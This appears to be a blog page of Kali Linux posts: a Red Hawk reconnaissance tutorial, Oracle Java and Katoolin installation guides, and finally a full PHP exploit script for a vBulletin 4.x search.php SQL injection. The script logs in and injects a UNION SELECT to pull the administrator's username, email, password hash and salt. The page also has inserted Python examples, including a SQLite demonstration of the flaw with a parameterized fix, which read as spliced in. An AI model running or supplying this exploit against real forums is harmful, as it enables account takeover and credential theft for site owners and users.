Tuesday, 29 January 2019
Website Information Gathering with Red Hawk on Kali.
Welcome back hackers and pentesters to a tutorial on all-in-one information gathering and vulnerability analysis with a Linux tool called Red Hawk. Recon and mapping out our target is a key step before we begin to hack or exploit anything. This tool helps automate that by showing what our targeted site is running and whether there are any known exploits for it. Let's install it from our terminal, change to its directory, and then run it:
git clone https://github.com/Tuhinshubhra/RED_HAWK
Then change to red hawk directory:
cd RED_HAWK
Now lets run it:
php rhawk.php
Now enter your website and hit enter. Then specify whether it uses http or https. We now have options for what we would like Red Hawk to search for; we are going to go with option one. As mapping out our target site is one of the first steps in pentesting, using Red Hawk can easily speed up this process by having these tools in one place.
As you can see, Red Hawk has scanned our target site. From this we learned that the target site does not use Cloudflare DDoS protection, runs Pepyaka version 1.13.10, etc. This is all useful information for mapping out the target and from there trying to find ways we can attack. To use it again, just enter php rhawk.php from the same terminal; if you closed it, change directories to RED_HAWK/ again. That's all for today folks, get to scanning!
Sunday, 29 October 2017
How To Install Oracle Java 8 In Debian Via Repository [JDK8]
Oracle Java 8 was released yesterday and it can be installed in Debian by using the WebUpd8 Java PPA repository.
Usually, the packages available in Launchpad PPAs don't support Debian because they are built against specific Ubuntu libraries, but since the WebUpd8 Oracle Java PPA contains just an installer, it works on Debian too.
Using this PPA repository, you'll be able to install Oracle Java 8 (which includes both JRE8 and JDK8) in Debian for both 32bit and 64bit as well as ARM (ARM v6/v7 Hard Float ABI - there's no JDK 8 ARM Soft Float ABI archive available for download on Oracle's website).
The installer automatically downloads and installs Oracle JDK8, but no actual Java files are available in our repository (that's not allowed by the Oracle Java license).
For Ubuntu / Linux Mint installation instructions, see: Install Oracle Java 8 In Ubuntu Via PPA Repository [JDK8]
Install Oracle Java 8 (both JDK8 and JRE8) in Debian
Tested on Debian Wheezy but it should work with any Debian version.
To add the WebUpd8 Oracle Java PPA repository and install Oracle Java 8 in Debian, use the following commands:
su -
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer
exit
And that's it, Oracle Java 8 should now be installed and you should get automatic updates for future Oracle Java 8 versions, under Debian.
-----------------------------------------------------------
Update October 20, 2016:
Previously, this package would increment the Java priority to make it default. The oracle-java8-installer package now sets the Java priority to 1081, and that may or may not set it as default, depending on other Java packages you may have installed (for instance, if Java 7 is also installed, Java 8 becomes default, but if Java 9 is installed, Java 8 doesn't become default).
To make Java 8 default, you must install the "oracle-java8-set-default" package (which configures the Java environment variables and sets it as default), which I added as a "Recommended" package to "oracle-java8-installer".
For instance, in Ubuntu, recommended packages are automatically installed, so "oracle-java8-set-default" should be installed when installing "oracle-java8-installer". In Linux Mint on the other hand, recommended packages are not installed by default, so you must install this package manually if you want to set Oracle Java 8 as default.
So, if you want to set Oracle Java 8 as default, no matter what other Java versions are installed, make sure that you install the oracle-java8-set-default package (which, again, should be automatically installed with the main Oracle Java Installer package in Ubuntu, but not in Linux Mint):
sudo apt-get install oracle-java8-set-default
If you don't want to make Oracle Java 8 default (it might still be set as default, depending on what other Java versions you may have installed), install the oracle-java8-installer with "--no-install-recommends":
sudo apt-get install --no-install-recommends oracle-java8-installer
Note: removing the oracle-java8-set-default package does not undo all the changes (I have yet to find a way to do this properly). If you don't want to set it as default, remove both the oracle-java8-installer and oracle-java8-set-default packages, and then install oracle-java8-installer with "--no-install-recommends" (as mentioned above).
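The priority rule above (1081 wins over a lower-priority Java 7 alternative, loses to a higher-priority Java 9 one) can be checked against `update-alternatives --query java` before trusting the default. The script below is an added example, not part of the original article or the installer package; the 1081 value is the one stated above, while the Java 7 and Java 9 priorities and paths in the sample output are constructed for illustration.

```python
"""Added example: decide which `java` alternative update-alternatives will
pick in auto mode, to check whether Oracle Java 8 (priority 1081) is the
default on this host."""
import re
import subprocess
from typing import Dict, List, Optional

# Constructed sample of `update-alternatives --query java` output. Priority
# 1081 is the value the article states for oracle-java8-installer; the Java 7
# priority (1071) and the jvm paths are assumptions for this illustration.
SAMPLE_QUERY = """\
Name: java
Link: /usr/bin/java
Status: auto
Best: /usr/lib/jvm/java-8-oracle/jre/bin/java
Value: /usr/lib/jvm/java-8-oracle/jre/bin/java

Alternative: /usr/lib/jvm/java-7-oracle/jre/bin/java
Priority: 1071
Slaves:
 java.1.gz /usr/lib/jvm/java-7-oracle/jre/man/man1/java.1.gz

Alternative: /usr/lib/jvm/java-8-oracle/jre/bin/java
Priority: 1081
Slaves:
 java.1.gz /usr/lib/jvm/java-8-oracle/jre/man/man1/java.1.gz
"""


def parse_alternatives(query_output: str) -> List[Dict[str, object]]:
    """Turn each 'Alternative:' stanza into {'path': ..., 'priority': ...}."""
    alts: List[Dict[str, object]] = []
    for stanza in re.split(r"\n\s*\n", query_output.strip()):
        path: Optional[str] = None
        prio: Optional[int] = None
        for line in stanza.splitlines():
            if line.startswith("Alternative:"):
                path = line.split(":", 1)[1].strip()
            elif line.startswith("Priority:"):
                prio = int(line.split(":", 1)[1].strip())
        if path is not None and prio is not None:
            alts.append({"path": path, "priority": prio})
    return alts


def auto_choice(query_output: str) -> Optional[str]:
    """Path update-alternatives uses: in auto mode the highest priority wins;
    in manual mode the current Value is kept regardless of priorities."""
    status = re.search(r"^Status:\s*(\w+)", query_output, re.M)
    if status and status.group(1) == "manual":
        value = re.search(r"^Value:\s*(.+)$", query_output, re.M)
        return value.group(1).strip() if value else None
    alts = parse_alternatives(query_output)
    if not alts:
        return None
    return max(alts, key=lambda a: a["priority"])["path"]  # type: ignore[arg-type]


def java8_is_default(query_output: str) -> bool:
    choice = auto_choice(query_output)
    return choice is not None and "java-8" in choice


def with_java9(query_output: str) -> str:
    """Append a constructed Java 9 stanza (priority 1091, an assumed value
    above 1081) to reproduce the caveat that Java 8 then loses the default."""
    return query_output.rstrip("\n") + """

Alternative: /usr/lib/jvm/java-9-oracle/bin/java
Priority: 1091
Slaves:
"""


def live_query(name: str = "java") -> str:
    """Fetch the real output on a Debian/Ubuntu host."""
    return subprocess.run(["update-alternatives", "--query", name],
                          check=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print("Java 8 default:", java8_is_default(SAMPLE_QUERY))
    print("Java 8 default once Java 9 is installed:",
          java8_is_default(with_java9(SAMPLE_QUERY)))
```

Replace SAMPLE_QUERY with live_query() to check the machine you just installed on.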
-----------------------------------------------------------
Tip: if you're behind a firewall / router that blocks some of the redirects required to download the Oracle Java archive, you can download the JDK tar.gz archive manually and place it under /var/cache/oracle-jdk8-installer - then, installing the "oracle-java8-installer" package will use the local archive instead of trying to download it itself.
After installing Oracle Java and the "oracle-java8-set-default" package, you can check out the Java version on your system by using these commands:
java -version
This should display something like this:
java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)
Or:
javac -version
Which should display something like this:
javac 1.8.0_111
For how to install Oracle Java 7 in Debian, see THIS article.
For Oracle Java 9, see THIS article.
How to accept the Oracle JDK8 license automatically
The Oracle Java 8 installer requires you to accept the Oracle license before the installation begins. If for some reason you want to accept the license automatically, you can use the following command:
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | sudo /usr/bin/debconf-set-selections
Update: if the command above doesn't work, use the following (thanks to Adam!):
echo oracle-java8-installer shared/accepted-oracle-licence-v1-1 boolean true | sudo /usr/bin/debconf-set-selections
Install packages you want in kali linux light
If you have downloaded Kali Linux 32 bit mini, Kali Linux 64 bit mini, Kali Linux 32 bit Light or Kali Linux 64 bit Light, you might find that some tools are missing and only some basic tools are available, such as nmap and Aircrack-ng.
Kali Linux provides multiple metapackages that allow us to easily install subsets of tools based on our particular needs. After installing the Kali Linux mini or Light version, here is what you want to do first. Below is the way to install the package you want.
1. Make sure you have the correct repo. For more info go to http://docs.kali.org/general-use/kali-linux-sources-list-repositories
a. Always take a backup
# mv /etc/apt/sources.list /etc/apt/sources.list_BAK
b. Create a repo source file
# vi /etc/apt/sources.list
c. Paste following
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
# sudo apt-get update
d. search available metapackages
# apt-cache search kali-linux
You can play around with apt-cache:
# apt-cache -h
# apt-cache showpkg kali-linux
e. If you want the kali-linux-web package, install it with the command below:
# apt-get install kali-linux-web
Find the list of tools inside each package: http://tools.kali.org/kali-metapackages
What if you just want a single tool? For example, if arpspoof is not there by default and you want to install it:
# apt-cache search arpspoof
# apt-get install dsniff
There you go :)
How to Auto Install All Kali Linux Tools Using “Katoolin” on Debian/Ubuntu
Katoolin is a script that helps install Kali Linux tools on your Linux distribution of choice. Those of us who like to use the penetration testing tools provided by the Kali Linux development team can use them on their preferred Linux distribution with Katoolin.
In this tutorial we are going to look at steps to install Katoolin on Debian based derivatives.
Major Features of Katoolin
- Adding Kali Linux repositories.
- Removing Kali Linux repositories.
- Installing Kali Linux tools.
Requirements
Requirements for installing and using Katoolin:
- An operating system; in this case we are using Ubuntu 14.04 64-bit.
- Python 2.7
Installing Katoolin
To install Katoolin run the following commands.
# apt-get install git
# git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
Sample Output
cp katoolin/katoolin.py /usr/bin/katoolin
Cloning into 'katoolin'...
remote: Counting objects: 52, done.
remote: Total 52 (delta 0), reused 0 (delta 0), pack-reused 52
Unpacking objects: 100% (52/52), done.
Checking connectivity... done.
# chmod +x /usr/bin/katoolin
Now you can run Katoolin as follows.
# katoolin
The output below shows the interface of Katoolin when you run the command.
Sample Output
+ -- -- +=[ Author: LionSec | Homepage: www.lionsec.net
+ -- -- +=[ 330 Tools
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
As you can see it provides a menu from which you can make selections of what you want to do.
In case the above way of installation fails, you can also try the following steps.
Go to the https://github.com/LionSec/katoolin.git page, download the zip file and extract it.
# wget https://github.com/LionSec/katoolin/archive/master.zip
# unzip master.zip
After extracting, you should be able to find the katoolin.py script. Run the katoolin.py command and you will see output similar to the above.
# cd katoolin-master/
# chmod 755 katoolin.py
# ./katoolin.py
How do I use Katoolin?
To add Kali Linux repositories and update repositories, select option 1 from the menu.
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1
Sample Output
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.DC9QzwECdM --no-auto-check-trustdb --trust-model always --keyring /etc/apt/trusted.gpg --primary-keyring /etc/apt/trusted.gpg --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server pgp.mit.edu
gpg: key 7D8D0BF6: public key "Kali Linux Repository <devel@kali.org>" imported
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
Then you can select option 2 from the interface above to update the repositories. From the output below, I have only captured the portion where the Kali Linux repositories are being updated, so that one can install Kali Linux tools in Ubuntu.
What do you want to do ?> 2
Ign http://in.archive.ubuntu.com vivid InRelease
Ign http://security.ubuntu.com vivid-security InRelease
Ign http://in.archive.ubuntu.com vivid-updates InRelease
Get:1 http://security.ubuntu.com vivid-security Release.gpg [933B]
Ign http://in.archive.ubuntu.com vivid-backports InRelease
Get:2 http://repo.kali.org kali-bleeding-edge InRelease [11.9 kB]
Get:3 http://security.ubuntu.com vivid-security Release [63.5 kB]
Hit http://in.archive.ubuntu.com vivid Release.gpg
Get:4 http://repo.kali.org kali-bleeding-edge/main amd64 Packages [8,164 B]
Get:5 http://in.archive.ubuntu.com vivid-updates Release.gpg [933 B]
Get:6 http://repo.kali.org kali-bleeding-edge/main i386 Packages [8,162 B]
Hit http://in.archive.ubuntu.com vivid-backports Release.gpg
...
If you want to delete the Kali Linux repositories you added, then select option 3.
What do you want to do ?> 3
All kali linux repositories have been deleted !
As part of its operation, the apt package manager uses /etc/apt/sources.list, which lists the 'sources' from which you can obtain and install packages. To view the contents of the /etc/apt/sources.list file, select option 4.
What do you want to do ?> 4
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
...
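Both the sana sources list from the Kali Light section and the Ubuntu list shown under option 4 above are plain sources.list entries, and after Katoolin has added or removed Kali repositories it is worth checking which entries actually point at Kali rather than trusting the menu message. The parser below is an added example, not part of Katoolin or the original tutorial; the two Kali lines appended to the Ubuntu sample are constructed, since the page does not show the exact lines Katoolin writes.

```python
"""Added example: parse /etc/apt/sources.list entries and report the
enabled entries served from kali.org hosts, i.e. what Katoolin's option 3
is expected to remove from an Ubuntu system."""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import urlparse


@dataclass
class SourceEntry:
    kind: str              # "deb" or "deb-src"
    uri: str
    suite: str
    components: List[str]
    enabled: bool          # False when the line is commented out with '#'
    options: str = ""      # text inside an optional [arch=...] bracket


# One sources.list entry:  [#]deb[-src] [options] uri suite component...
# A cdrom: URI carries its label in brackets and may contain spaces, so the
# URI is matched as either that bracketed form or a run of non-space chars.
_ENTRY = re.compile(
    r"^\s*(?P<comment>#\s*)?(?P<kind>deb(?:-src)?)\s+"
    r"(?:\[(?P<opts>[^\]]*)\]\s+)?"
    r"(?P<uri>cdrom:\[[^\]]*\]\S*|\S+)\s+"
    r"(?P<suite>\S+)\s*(?P<comps>.*?)\s*$"
)

# Sample built from the sources.list the tutorial shows under option 4
# (Ubuntu 15.04 'vivid'), plus two constructed Kali lines (assumed, not taken
# from the page) to stand in for what Katoolin adds.
UBUNTU_PLUS_KALI = """\
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb http://repo.kali.org/kali kali-bleeding-edge main
deb [arch=amd64] http://http.kali.org/kali sana main non-free contrib
"""

# The 'sana' sources list from the Kali Light section of the page.
SANA_SOURCES = """\
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
"""


def parse_sources(text: str) -> List[SourceEntry]:
    entries: List[SourceEntry] = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue   # blank lines and ordinary comments
        entries.append(SourceEntry(
            kind=m.group("kind"),
            uri=m.group("uri"),
            suite=m.group("suite"),
            components=m.group("comps").split(),
            enabled=m.group("comment") is None,
            options=m.group("opts") or "",
        ))
    return entries


def host_of(entry: SourceEntry) -> str:
    return (urlparse(entry.uri).hostname or "").lower()


def _is_kali(host: str) -> bool:
    return host == "kali.org" or host.endswith(".kali.org")


def _is_ubuntu(host: str) -> bool:
    return host == "ubuntu.com" or host.endswith(".ubuntu.com")


def kali_entries(text: str) -> List[SourceEntry]:
    """Enabled entries served from a kali.org host."""
    return [e for e in parse_sources(text) if e.enabled and _is_kali(host_of(e))]


def mixes_distributions(text: str) -> bool:
    """True when enabled entries point at both Kali and Ubuntu archives."""
    hosts = {host_of(e) for e in parse_sources(text) if e.enabled}
    return any(map(_is_kali, hosts)) and any(map(_is_ubuntu, hosts))


if __name__ == "__main__":
    for e in kali_entries(UBUNTU_PLUS_KALI):
        print(e.kind, e.uri, e.suite, e.components)
    print("mixed Kali/Ubuntu sources:", mixes_distributions(UBUNTU_PLUS_KALI))
```

Feed it the real file with parse_sources(open("/etc/apt/sources.list").read()) to see what remains after option 3.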
To go back you can simply type back and press the [Enter] key.
What do you want to do ?> back
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
To go back to the main menu, simply type gohome and press the [Enter] key.
kat > gohome
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
There are different categories of Kali Linux tools you can install on your Ubuntu using Katoolin. To view the available categories, select option 2 from the main menu.
kat > 2
**************************** All Categories *****************************
1) Information Gathering 8) Exploitation Tools
2) Vulnerability Analysis 9) Forensics Tools
3) Wireless Attacks 10) Stress Testing
4) Web Applications 11) Password Attacks
5) Sniffing & Spoofing 12) Reverse Engineering
6) Maintaining Access 13) Hardware Hacking
7) Reporting Tools 14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
You can select a category of choice, or install all available Kali Linux tools by selecting option (0) and pressing [Enter].
You can also install a ClassicMenu indicator using Katoolin.
- ClassicMenu Indicator is an application indicator for the top panel of Ubuntu's Unity desktop environment.
- ClassicMenu Indicator provides a simple way for you to get a classic GNOME-style application menu for those who prefer this over the default Unity dash menu.
To install the classicmenu indicator, press y and then press [Enter].
kat > back
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
ClassicMenu Indicator is a notification area applet (application indicator) for the top panel of Ubuntu's Unity desktop environment.
It provides a simple way to get a classic GNOME-style application menu for those who prefer this over the Unity dash menu.
Like the classic GNOME menu, it includes Wine games and applications if you have those installed.
For more information , please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
Do you want to install classicmenu indicator ? [y/n]> y
This PPA contains the most recent alpha/beta releases for
* Arronax http://www.florian-diesch.de/software/arronax/
* ClassicMenu Indicator http://www.florian-diesch.de/software/classicmenu-indicator/
* Privacy Indicator http://www.florian-diesch.de/software/indicator-privacy/
* RunLens http://www.florian-diesch.de/software/runlens/
* Unsettings http://www.florian-diesch.de/software/unsettings/
* UUdeLens http://www.florian-diesch.de/software/uudelens
More info: https://launchpad.net/~diesch/+archive/ubuntu/testing
Press [ENTER] to continue or ctrl-c to cancel adding it
gpg: keyring `/tmp/tmpaqk6fphl/secring.gpg' created
gpg: keyring `/tmp/tmpaqk6fphl/pubring.gpg' created
...
You can also install the Kali menu in Ubuntu by selecting option 4, pressing y and then pressing [Enter]. To quit Katoolin, simply press Control+C.
kat > ^CShutdown requested...Goodbye...
Monday, 11 September 2017
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"
8888888b. d8888 888888b. .d8888b. .d88888b. 888 888 888b 888
888 Y88b d88888 888 "88b d88P Y88b d88P" "Y88b 888 888 8888b 888
888 888 d88P888 888 .88P .d88P 888 888 888 888 88888b 888
888 d88P d88P 888 8888888K. 8888" 888 888 888 888 888Y88b 888
8888888P" d88P 888 888 "Y88b "Y8b. 888 888 888 888 888 Y88b888
888 T88b d88P 888 888 888 888 888 888 888 888 888 888 Y88888
888 T88b d8888888888 888 d88P Y88b d88P Y88b. .d88P Y88b. .d88P 888 Y8888
888 T88b d88P 888 8888888P" "Y8888P" "Y88888P" "Y88888P" 888 Y888
mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>
<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text' size='100' name='query' value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>
<?
if($_POST['form_action'] == 1 )
{
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];
$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
$md5Pass = md5($pass);
$data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
$url2= trim(myf($store,"Location:","Content-Length:"));
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");
//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
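The defect this script relies on is that the cat[] category ids are pasted into the search query as text, so a value that closes the IN (...) list can append a UNION SELECT on the user table. The snippet below is an added example, not part of the exploit or of vBulletin: a constructed SQLite stand-in for the two tables, the same pattern in its vulnerable form beside a parameterized one that rejects anything but integers, with the payload rewritten for SQLite (|| instead of concat(), -- instead of #). Table and column names are assumptions for the illustration.

```python
"""Added example: the cat[] concatenation bug from the vBulletin search
exploit, reproduced on an in-memory SQLite database next to the fixed query."""
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the searchgroup and user tables; every value
    here is made up (placeholder hash and salt, invalid e-mail domain)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE searchgroup(groupid INTEGER, categoryid INTEGER, title TEXT);
        CREATE TABLE user(userid INTEGER, username TEXT, email TEXT,
                          password TEXT, salt TEXT);
        INSERT INTO searchgroup VALUES (1, 1, 'romance');
        INSERT INTO searchgroup VALUES (2, 2, 'thriller');
        INSERT INTO user VALUES (1, 'admin', 'admin@example.invalid',
                                 'md5hash-placeholder', 'salt-placeholder');
    """)
    return db


def search_vulnerable(db: sqlite3.Connection, cats: List[str]) -> List[str]:
    """Mirrors the bug: each cat[] value goes into the SQL text unchanged."""
    sql = ("SELECT title FROM searchgroup WHERE categoryid IN ("
           + ",".join(cats) + ")")
    return [row[0] for row in db.execute(sql)]


def search_hardened(db: sqlite3.Connection, cats: List[str]) -> List[str]:
    """Fix: coerce every value to int (reject anything else) and bind the
    ids through placeholders, so the list can never change the statement."""
    try:
        ids = [int(c) for c in cats]
    except ValueError as exc:
        raise ValueError("cat[] must contain integers only") from exc
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT title FROM searchgroup WHERE categoryid IN ({placeholders})"
    return [row[0] for row in db.execute(sql, ids)]


# The page's cat[0] payload adapted to SQLite syntax.
PAYLOAD = ("1) UNION SELECT username || ':' || email || ':' || password || ':' "
           "|| salt FROM user WHERE userid=1 --")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, [PAYLOAD]))
    try:
        search_hardened(db, [PAYLOAD])
    except ValueError as err:
        print("hardened:", err)
```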